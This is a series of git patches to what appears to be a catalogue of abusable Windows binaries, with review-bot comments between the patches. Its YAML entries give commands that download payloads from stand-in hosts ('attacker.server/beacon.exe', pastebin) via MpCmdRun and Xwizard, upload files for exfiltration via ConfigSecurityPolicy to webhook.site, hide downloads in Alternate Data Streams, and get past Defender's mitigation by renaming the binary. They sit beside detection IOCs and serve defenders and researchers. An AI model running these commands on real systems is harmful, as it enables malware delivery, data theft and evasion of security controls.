From 020416d098506c395e7974cd65f0f5fa7e92f79f Mon Sep 17 00:00:00 2001
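Review bot: The rewritten Acknowledgement line `+ - Person: Hai Vaknin(Lux` in the Extrac32.yml hunk lost its closing parenthesis when the GitHub link was stripped; it should read `- Person: Hai Vaknin(Lux)`, as both the removed line and the Vbc.yml entry later in this series spell it. The same person is credited with handle `'@VakninHai'` here and `'@vakninhai'` in Diantz.yml; picking one casing would keep the generated site consistent.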
From: Oddvar Moe
Date: Sat, 15 Aug 2020 00:26:35 +0200
Subject: [PATCH 63/96] Delete Update.yml
---
 yml/OtherMSBinaries/Update.yml | 32 --------------------------------
 1 file changed, 32 deletions(-)
 delete mode 100644 yml/OtherMSBinaries/Update.yml
diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml
deleted file mode 100644
index 91c46cc..0000000
--- a/yml/OtherMSBinaries/Update.yml
+++ /dev/null
@@ -1,32 +0,0 @@
----
-Name: Update.exe
-Description: Update is the squirrel update utility used by Microsoft Electron app (Teams in this case)
-Author: 'Mr.Un1k0d3r'
-Created: '2019-06-26'
-Commands:
- - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
- Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
- Usecase: Application Whitelisting Bypass
- Category: AWL Bypass
- Privileges: User
- MitreID: T1218
- MitreLink: https://attack.mitre.org/wiki/Technique/T1218
- OperatingSystem: Windows 7 and up with Microsoft Teams installed
- - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
- Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
- Usecase: Execute binary
- Category: Execute
- Privileges: User
- MitreID: T1218
- MitreLink: https://attack.mitre.org/wiki/Technique/T1218
- OperatingSystem: Windows 7 and up with Microsoft Teams installed
-Full_Path:
- - Path: '%userprofile%\AppData\Local\Microsoft\Teams\Update.exe'
-Detection:
- - IOC: Update.exe spawned an unknown process
-Resources:
- - Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408
-Acknowledgement:
- - Person: Mr.Un1k0d3r
- Handle: '@MrUn1k0d3r'
----
From 39f55359ef916f51156671a642dfe35d5987fb06 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Sat, 15 Aug 2020 00:26:53 +0200
Subject: [PATCH 64/96] Rename update.yml to Update.yml
---
 yml/OtherMSBinaries/{update.yml => Update.yml} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename yml/OtherMSBinaries/{update.yml => Update.yml} (100%)
diff --git a/yml/OtherMSBinaries/update.yml b/yml/OtherMSBinaries/Update.yml
similarity index 100%
rename from yml/OtherMSBinaries/update.yml
rename to yml/OtherMSBinaries/Update.yml
From 8cf6ef53fb4d392700e67ddfd7991e1f330a62ad Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Sat, 15 Aug 2020 00:27:11 +0200
Subject: [PATCH 65/96] Rename squirrel.yml to Squirrel.yml
---
 yml/OtherMSBinaries/{squirrel.yml => Squirrel.yml} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename yml/OtherMSBinaries/{squirrel.yml => Squirrel.yml} (100%)
diff --git a/yml/OtherMSBinaries/squirrel.yml b/yml/OtherMSBinaries/Squirrel.yml
similarity index 100%
rename from yml/OtherMSBinaries/squirrel.yml
rename to yml/OtherMSBinaries/Squirrel.yml
From 2cf7d8cdeb5549b23fdc3bc6ce4e34abe7be8cab Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Mon, 24 Aug 2020 09:28:38 +0200
Subject: [PATCH 66/96] Adjusted missing ticks in Acknowledgement
---
 yml/OSBinaries/Ttdinject.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml
index b208c85..0acccdd 100644
--- a/yml/OSBinaries/Ttdinject.yml
+++ b/yml/OSBinaries/Ttdinject.yml
@@ -32,7 +32,7 @@ Resources:
 - Link: https://twitter.com/Oddvarmoe/status/1196333160470138880
 Acknowledgement:
 - Person: Oddvar Moe
- Handle: @oddvarmoe
+ Handle: '@oddvarmoe'
 - Person: Maxime Nadeau
- Handle: @m_nad0
+ Handle: '@m_nad0'
 ---
From fa3710ede5569f2191e647475597e996b9058298 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Mon, 24 Aug 2020 09:32:54 +0200
Subject: [PATCH 67/96] Rename certreq.yml to Certreq.yml
---
 yml/OSBinaries/{certreq.yml => Certreq.yml} | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename yml/OSBinaries/{certreq.yml => Certreq.yml} (99%)
diff --git a/yml/OSBinaries/certreq.yml b/yml/OSBinaries/Certreq.yml
similarity index 99%
rename from yml/OSBinaries/certreq.yml
rename to yml/OSBinaries/Certreq.yml
index b02f001..b9a69bf 100644
--- a/yml/OSBinaries/certreq.yml
+++ b/yml/OSBinaries/Certreq.yml
@@ -33,4 +33,4 @@ Resources:
 Acknowledgement:
 - Person: David Middlehurst
 Handle: '@dtmsecurity'
----
\ No newline at end of file
+---
From 380b8cfecdd6b120c7018548cc9a5b7861be48e4 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Mon, 24 Aug 2020 09:33:22 +0200
Subject: [PATCH 68/96] Rename ilasm.yml to Ilasm.yml
---
 yml/OSBinaries/{ilasm.yml => Ilasm.yml} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename yml/OSBinaries/{ilasm.yml => Ilasm.yml} (100%)
diff --git a/yml/OSBinaries/ilasm.yml b/yml/OSBinaries/Ilasm.yml
similarity index 100%
rename from yml/OSBinaries/ilasm.yml
rename to yml/OSBinaries/Ilasm.yml
From 4792d22ddd49bb066ab1e6b3417161fbcce5a258 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Mon, 24 Aug 2020 09:33:37 +0200
Subject: [PATCH 69/96] Rename vbc.yml to Vbc.yml
---
 yml/OSBinaries/{vbc.yml => Vbc.yml} | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename yml/OSBinaries/{vbc.yml => Vbc.yml} (99%)
diff --git a/yml/OSBinaries/vbc.yml b/yml/OSBinaries/Vbc.yml
similarity index 99%
rename from yml/OSBinaries/vbc.yml
rename to yml/OSBinaries/Vbc.yml
index 52a479d..4e95905 100644
--- a/yml/OSBinaries/vbc.yml
+++ b/yml/OSBinaries/Vbc.yml
@@ -30,4 +30,4 @@ Acknowledgement:
 Handle:
 - Person: Hai Vaknin(Lux)
 Handle:
----
\ No newline at end of file
+---
From 57346d17f415ebff1a6172da3e03380e05555f15 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Mon, 24 Aug 2020 09:34:56 +0200
Subject: [PATCH 70/96] Changed capitalization inside file
---
 yml/OSBinaries/Ttdinject.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml
index 0acccdd..124ea50 100644
--- a/yml/OSBinaries/Ttdinject.yml
+++ b/yml/OSBinaries/Ttdinject.yml
@@ -1,5 +1,5 @@
 ---
-Name: ttdinject.exe
+Name: Ttdinject.exe
 Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
 Author: 'Maxime Nadeau'
 Created: '2020-05-12'
From c5c6820c56ae080ff73cc39c5f708fd78b442af9 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Mon, 24 Aug 2020 09:42:07 +0200
Subject: [PATCH 71/96] Rename agentexecutor.yml to Agentexecutor.yml
---
 yml/OtherMSBinaries/{agentexecutor.yml => Agentexecutor.yml} | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename yml/OtherMSBinaries/{agentexecutor.yml => Agentexecutor.yml} (99%)
diff --git a/yml/OtherMSBinaries/agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml
similarity index 99%
rename from yml/OtherMSBinaries/agentexecutor.yml
rename to yml/OtherMSBinaries/Agentexecutor.yml
index 79a19d4..6c63788 100644
--- a/yml/OtherMSBinaries/agentexecutor.yml
+++ b/yml/OtherMSBinaries/Agentexecutor.yml
@@ -31,4 +31,4 @@ Resources:
 Acknowledgement:
 - Person: Eleftherios Panos
 Handle: @lefterispan
----
\ No newline at end of file
+---
From 9b290ba808b27f020a0020bb94f4923731519f22 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Mon, 24 Aug 2020 09:46:09 +0200
Subject: [PATCH 72/96] Update and rename diantz.yml to Diantz.yml
---
 yml/OSBinaries/{diantz.yml => Diantz.yml} | 7 +++----
 1 file changed, 3 insertions(+), 4 deletions(-)
 rename yml/OSBinaries/{diantz.yml => Diantz.yml} (95%)
diff --git a/yml/OSBinaries/diantz.yml b/yml/OSBinaries/Diantz.yml
similarity index 95%
rename from yml/OSBinaries/diantz.yml
rename to yml/OSBinaries/Diantz.yml
index a79ecc3..6781774 100644
--- a/yml/OSBinaries/diantz.yml
+++ b/yml/OSBinaries/Diantz.yml
@@ -1,6 +1,5 @@
-
 ---
-Name: diantz.exe
+Name: Diantz.exe
 Description: Binary that package existing files into a cabinet (.cab) file
 Author: Tamir Yehuda
 Created: 08/08/2020
@@ -33,7 +32,7 @@ Resources:
 - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz
 Acknowledgement:
 - Person: Tamir Yehuda
- Handle: @tim8288
+ Handle: '@tim8288'
 - Person: Hai Vaknin
- Handle: @vakninhai
+ Handle: '@vakninhai'
 ---
From 525fc0c1eb2a2299de09802e220eacbbb3909689 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Mon, 24 Aug 2020 09:48:07 +0200
Subject: [PATCH 73/96] Added missing ticks in Diantz
---
 yml/OSBinaries/Diantz.yml | 4 ++--
 yml/OtherMSBinaries/Agentexecutor.yml | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/yml/OSBinaries/Diantz.yml b/yml/OSBinaries/Diantz.yml
index 6781774..46a3c02 100644
--- a/yml/OSBinaries/Diantz.yml
+++ b/yml/OSBinaries/Diantz.yml
@@ -1,8 +1,8 @@
 ---
 Name: Diantz.exe
 Description: Binary that package existing files into a cabinet (.cab) file
-Author: Tamir Yehuda
-Created: 08/08/2020
+Author: 'Tamir Yehuda'
+Created: '08/08/2020'
 Commands:
 - Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
 Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml
index 6c63788..23850c1 100644
--- a/yml/OtherMSBinaries/Agentexecutor.yml
+++ b/yml/OtherMSBinaries/Agentexecutor.yml
@@ -30,5 +30,5 @@ Resources:
 - Link:
 Acknowledgement:
 - Person: Eleftherios Panos
- Handle: @lefterispan
+ Handle: '@lefterispan'
 ---
From 38a3d406b0473c38e4c488822da001db57e50f7f Mon Sep 17 00:00:00 2001
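Review bot: `+Created: '08/08/2020'` in the Diantz.yml hunk is ambiguous between day/month and month/day and differs from the ISO form the other entries in this series use, e.g. `Created: '2020-08-12'` in pktmon.yml; quoting it fixed the YAML type but not the format. I would write `Created: '2020-08-08'`. The context line `Description: Compress taget file ...` also carries a typo (`taget` → `target`) that is not touched by this hunk.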
From: Oddvar Moe
Date: Mon, 24 Aug 2020 09:51:48 +0200
Subject: [PATCH 74/96] Update and rename pktmon.yml to Pktmon.yml
---
 yml/OSBinaries/{pktmon.yml => Pktmon.yml} | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)
 rename yml/OSBinaries/{pktmon.yml => Pktmon.yml} (88%)
diff --git a/yml/OSBinaries/pktmon.yml b/yml/OSBinaries/Pktmon.yml
similarity index 88%
rename from yml/OSBinaries/pktmon.yml
rename to yml/OSBinaries/Pktmon.yml
index 6eb22f4..29730a4 100644
--- a/yml/OSBinaries/pktmon.yml
+++ b/yml/OSBinaries/Pktmon.yml
@@ -1,7 +1,7 @@
 ---
-Name: pktmon.exe
+Name: Pktmon.exe
 Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
-Author: Derek Johnson
+Author: 'Derek Johnson'
 Created: '2020-08-12'
 Commands:
 - Command: pktmon.exe start --etw
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1040
 MitreLink: https://attack.mitre.org/wiki/Technique/T1040
 OperatingSystem: Windows 10 1809 and later
-- Command: pktmon.exe filter add -p 445
+ - Command: pktmon.exe filter add -p 445
 Description: Select Desired ports for packet capture
 Usecase: Look for interesting traffic such as telent or FTP
 Category: Reconnaissance
@@ -24,12 +24,12 @@ Full_Path:
 - Path: c:\windows\system32\pktmon.exe
 - Path: c:\windows\syswow64\pktmon.exe
 Code_Sample:
- - Code: http://url.com/git.txt
+ - Code:
 Detection:
 - IOC: .etl files found on system
 Resources:
 - Link: https://binar-x79.com/windows-10-secret-sniffer/
 Acknowledgement:
- - Person:
- Handle:
+ - Person: Derek Johnson
+ Handle: ''
 ---
From 9a5e2b114f69ec551acf12f4b504329ad8a5a8e7 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Thu, 3 Sep 2020 10:28:49 +0200
Subject: [PATCH 75/96] Fixed the OS versions on Diantz
---
 yml/OSBinaries/Diantz.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/yml/OSBinaries/Diantz.yml b/yml/OSBinaries/Diantz.yml
index 46a3c02..9c68aa5 100644
--- a/yml/OSBinaries/Diantz.yml
+++ b/yml/OSBinaries/Diantz.yml
@@ -19,7 +19,7 @@ Commands:
 Privileges: User
 MitreID: T1105
 MitreLink: https://attack.mitre.org/wiki/Technique/T1105
- OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
+ OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
 Full_Path:
 - Path: c:\windows\system32\diantz.exe
 - Path: c:\windows\syswow64\diantz.exe
From bfccb5108547ce0493a2bd2ebe94a31fec2d3d24 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Thu, 3 Sep 2020 10:55:37 +0200
Subject: [PATCH 76/96] Added MpCmdRun.exe
---
 yml/OSBinaries/MpCmdRun.yml | 40 +++++++++++++++++++++++++++++++++++++
 1 file changed, 40 insertions(+)
 create mode 100644 yml/OSBinaries/MpCmdRun.yml
diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml
new file mode 100644
index 0000000..8e9ca66
--- /dev/null
+++ b/yml/OSBinaries/MpCmdRun.yml
@@ -0,0 +1,40 @@
+---
+Name: MpCmdRun.exe
+Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
+Author: 'Oddvar Moe'
+Created: '09/03/2020'
+Commands:
+ - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
+ Description: Download file to specified path
+ Usecase: Download file
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+ OperatingSystem: Windows 10
+ - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe
+ Description: Download file to machine and store it in Alternate Data Stream
+ Usecase: Hide downloaded data inton an Alternate Data Stream
+ Category: ADS
+ Privileges: User
+ MitreID: T1096
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+ OperatingSystem: Windows 10
+Full_Path:
+ - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
+ - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
+ - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
+Code_Sample:
+ - Code:
+Detection:
+ - IOC: MpCmdRun storing data into alternate data streams.
+ - IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.
+Resources:
+ - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus
+ - Link: https://twitter.com/mohammadaskar2/status/1301263551638761477
+Acknowledgement:
+ - Person: Askar
+ Handle: '@mohammadaskar2'
+ - Person: Oddvar Moe
+ Handle: '@oddvarmoe'
+---
From 5c5a218faf33a75fd26ac7632bc6e8e3bfaec26c Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Thu, 3 Sep 2020 11:00:56 +0200
Subject: [PATCH 77/96] Updated links on mpcmdrun
---
 yml/OSBinaries/MpCmdRun.yml | 1 +
 1 file changed, 1 insertion(+)
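Review bot: Both commands use doubled backslashes, `-path c:\\temp\\beacon.exe` and `-path c:\\temp\\nicefile.txt:evil.exe`, inside unquoted YAML plain scalars, where a backslash is literal; the rendered command will therefore contain `\\` and is not a valid Windows path, while the Full_Path entries in the same file correctly use single backslashes, so the commands should read `-path c:\temp\beacon.exe` and `-path c:\temp\nicefile.txt:evil.exe`. The Full_Path list pins three specific Platform build directories (`4.18.2008.4-0`, `.7-0`, `.9-0`); a clause in the Description saying that the version directory changes with each Defender platform update would stop readers treating the list as exhaustive. Minor: `inton` in the second Usecase should be `into`, and `Created: '09/03/2020'` is ambiguous next to the ISO dates used by other entries in this series.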
diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml
index 8e9ca66..35cc106 100644
--- a/yml/OSBinaries/MpCmdRun.yml
+++ b/yml/OSBinaries/MpCmdRun.yml
@@ -32,6 +32,7 @@ Detection:
 Resources:
 - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus
 - Link: https://twitter.com/mohammadaskar2/status/1301263551638761477
+ - Link: https://twitter.com/Oddvarmoe/status/1301444858910052352
 Acknowledgement:
 - Person: Askar
 Handle: '@mohammadaskar2'
From 63c9bc97c3837acb6213a3c1ea682fa97962c4c4 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Thu, 3 Sep 2020 15:29:32 +0200
Subject: [PATCH 78/96] Added detection details on mpcmdrun
---
 yml/OSBinaries/MpCmdRun.yml | 3 +++
 1 file changed, 3 insertions(+)
diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml
index 35cc106..630d802 100644
--- a/yml/OSBinaries/MpCmdRun.yml
+++ b/yml/OSBinaries/MpCmdRun.yml
@@ -29,10 +29,13 @@ Code_Sample:
 Detection:
 - IOC: MpCmdRun storing data into alternate data streams.
 - IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.
+ - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
+ - IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log
 Resources:
 - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus
 - Link: https://twitter.com/mohammadaskar2/status/1301263551638761477
 - Link: https://twitter.com/Oddvarmoe/status/1301444858910052352
+ - Link: https://twitter.com/NotMedic/status/1301506813242867720
 Acknowledgement:
 - Person: Askar
 Handle: '@mohammadaskar2'
From 3078cc3755ff80e33a634ad812791ffa0c2dc261 Mon Sep 17 00:00:00 2001
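Review bot: The new IOC `Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe` will also fire on legitimate interactive use of the tool, since the entry itself documents these commands with `Privileges: User`; the discriminator is the argument, not the account. I would tighten it to `- IOC: mpcmdrun.exe launched by a non-SYSTEM/non-LOCAL SERVICE account with DownloadFile on the command line`, matching the commands at the top of the file. The `MpCmdRun.log` IOC would be more useful with its rationale stated: the path is under `%USERPROFILE%`, so the log's presence there appears to record that the tool ran in that user's context rather than as the service — worth confirming before wording it that way.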
From: Rich Rumble
Date: Thu, 3 Sep 2020 10:39:24 -0400
Subject: [PATCH 79/96] Update MpCmdRun.yml Added note that slashes (/) can also be used as command separators, and that the UA is MpCommunication Thanks!
---
 yml/OSBinaries/MpCmdRun.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml
index 630d802..fa85c4b 100644
--- a/yml/OSBinaries/MpCmdRun.yml
+++ b/yml/OSBinaries/MpCmdRun.yml
@@ -5,6 +5,7 @@ Author: 'Oddvar Moe'
 Created: '09/03/2020'
 Commands:
 - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
+ Note: Slashes work as command line argument seperators /Downloadfile, /url, /path, as well as mixing dash and slash
 Description: Download file to specified path
 Usecase: Download file
 Category: Download
@@ -31,6 +32,7 @@ Detection:
 - IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.
 - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
 - IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log
+ - IOC: User Agent is "MpCommunication"
 Resources:
 - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus
 - Link: https://twitter.com/mohammadaskar2/status/1301263551638761477
From 1b00b374b316576c4772f569a4ffad2cec6ca69b Mon Sep 17 00:00:00 2001
From: Rich Rumble
Date: Thu, 3 Sep 2020 11:46:25 -0400
Subject: [PATCH 80/96] Updated per suggestion Thanks!
---
 yml/OSBinaries/MpCmdRun.yml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml
index fa85c4b..160c771 100644
--- a/yml/OSBinaries/MpCmdRun.yml
+++ b/yml/OSBinaries/MpCmdRun.yml
@@ -5,8 +5,7 @@ Author: 'Oddvar Moe'
 Created: '09/03/2020'
 Commands:
 - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
- Note: Slashes work as command line argument seperators /Downloadfile, /url, /path, as well as mixing dash and slash
- Description: Download file to specified path
+ Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
 Usecase: Download file
 Category: Download
 Privileges: User
@@ -43,4 +42,6 @@ Acknowledgement:
 Handle: '@mohammadaskar2'
 - Person: Oddvar Moe
 Handle: '@oddvarmoe'
+ - Person: RichRumble
+ Handle: ''
 ---
From 6a5af9a71c62d37cfab07f4c63ff9981732a613a Mon Sep 17 00:00:00 2001
From: unload
Date: Fri, 4 Sep 2020 07:54:44 -0300
Subject: [PATCH 81/96] Create ConfigSecurityPolicy.yml
---
 yml/OSBinaries/ConfigSecurityPolicy.yml | 31 +++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 yml/OSBinaries/ConfigSecurityPolicy.yml
diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml
new file mode 100644
index 0000000..772dddb
--- /dev/null
+++ b/yml/OSBinaries/ConfigSecurityPolicy.yml
@@ -0,0 +1,31 @@
+---
+Name: ConfigSecurityPolicy.exe
+Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
+Author: 'Ialle Teixeira'
+Created: '04/09/2020'
+Commands:
+ - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
+ Description: Upload file, credentials or data exfiltration in general
+ Usecase: Upload file
+ Category: Upload
+ Privileges: User
+ MitreID: T1567
+ MitreLink: https://attack.mitre.org/techniques/T1567/
+ OperatingSystem: Windows 10
+Full_Path:
+ - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
+Code_Sample:
+ - Code:
+Detection:
+ - IOC: ConfigSecurityPolicy storing data into alternate data streams.
+ - IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.
+ - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.
+ - IOC: User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
+Resources:
+ - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads
+ - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads
+ - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor
+Acknowledgement:
+ - Person: Ialle Teixeira
+ Handle: '@NtSetDefault'
+---
From 11aa1e503b6655850286b1ba83af0adda904ebfc Mon Sep 17 00:00:00 2001
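Review bot: The Description's last two sentences (`you can configure different pilot collections for each of the co-management workloads...`) are lifted from the ConfigMgr co-management pages linked under Resources and say nothing about the binary; the entry should instead describe what the documented command shows — the binary takes a local file path and a URL and uploads that file to the URL — and none of the three links document that behaviour. The first Detection IOC, `ConfigSecurityPolicy storing data into alternate data streams`, mirrors MpCmdRun.yml but no ADS usage is documented here, so it should be dropped or replaced with `- IOC: ConfigSecurityPolicy.exe launched with a URL argument by a non-SYSTEM account`. The command's `C:\\Windows\\System32\\calc.exe` uses doubled backslashes in an unquoted YAML scalar and will render literally; single backslashes, as in the Full_Path entry, are what is wanted. `Created: '04/09/2020'` reads as day/month (the commit is dated 4 Sep) while MpCmdRun.yml's `'09/03/2020'` reads as month/day; ISO `'2020-09-04'` would remove the ambiguity.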
From: whickey-r7 <32334421+whickey-r7@users.noreply.github.com>
Date: Wed, 16 Sep 2020 16:34:47 +0000
Subject: [PATCH 82/96] Update Xwizard.yml This lolbin has functionality which allows downloading of files from the internet as well as previously outlined execution functionality.
---
 yml/OSBinaries/Xwizard.yml | 11 +++++++++++
 1 file changed, 11 insertions(+)
diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml
index f5afcee..5d95a19 100644
--- a/yml/OSBinaries/Xwizard.yml
+++ b/yml/OSBinaries/Xwizard.yml
@@ -20,6 +20,14 @@ Commands:
 MitreID: T1218
 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+ - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
+ Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.
+ Usecase: Download file from Internet
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+ OperatingSystem: Windows 10
 Full_Path:
 - Path: C:\Windows\System32\xwizard.exe
 - Path: C:\Windows\SysWOW64\xwizard.exe
@@ -32,6 +40,7 @@ Resources:
 - Link: https://www.youtube.com/watch?v=LwDHX7DVHWU
 - Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
 - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
+ - Link: https://twitter.com/notwhickey/status/1306023056847110144
 Acknowledgement:
 - Person: Adam
 Handle: '@Hexacorn'
@@ -39,4 +48,6 @@ Acknowledgement:
 Handle: '@NickTyrer'
 - Person: harr0ey
 Handle: '@harr0ey'
+ - Person: Wade Hickey
+ Handle: '@notwhickey'
 ---
From 13026a481be90843f09592a210aa63ab8f56d443 Mon Sep 17 00:00:00 2001
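Review bot: The new download command's Description says only that the RemoteApp and Desktop Connections wizard is used `to download a file`, without saying where the file is written; for a Download entry the landing path is what a defender needs, so the Description should name it (presumably the wizard's cache directory, if that is what the linked tweet shows — worth confirming). No Detection IOC accompanies the new behaviour; the file's Detection section lies between these hunks and is not visible here, but if it only covers the RunWizard execution case, `- IOC: xwizard.exe making outbound HTTP(S) connections` would cover this technique. The `/z` switch is fused to the URL (`/zhttps://...`); a short clause confirming that this is the intended syntax would stop readers reading it as a typo.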
From: "Cochin, Cedric"
Date: Thu, 24 Sep 2020 14:09:58 -0700
Subject: [PATCH 83/96] Update MpCmdRun.yml DownloadFile option has been removed from current MpCmdRun.exe, but old binary remains on disk. Defender cmd line mitigation can be bypassed by simply renaming the binary in a folder controlled by the attacker
---
 yml/OSBinaries/MpCmdRun.yml | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)
diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml
index 160c771..57da8bd 100644
--- a/yml/OSBinaries/MpCmdRun.yml
+++ b/yml/OSBinaries/MpCmdRun.yml
@@ -12,6 +12,14 @@ Commands:
 MitreID: T1105
 MitreLink: https://attack.mitre.org/wiki/Technique/T1105
 OperatingSystem: Windows 10
+ - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe
+ Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
+ Usecase: Download file
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1105
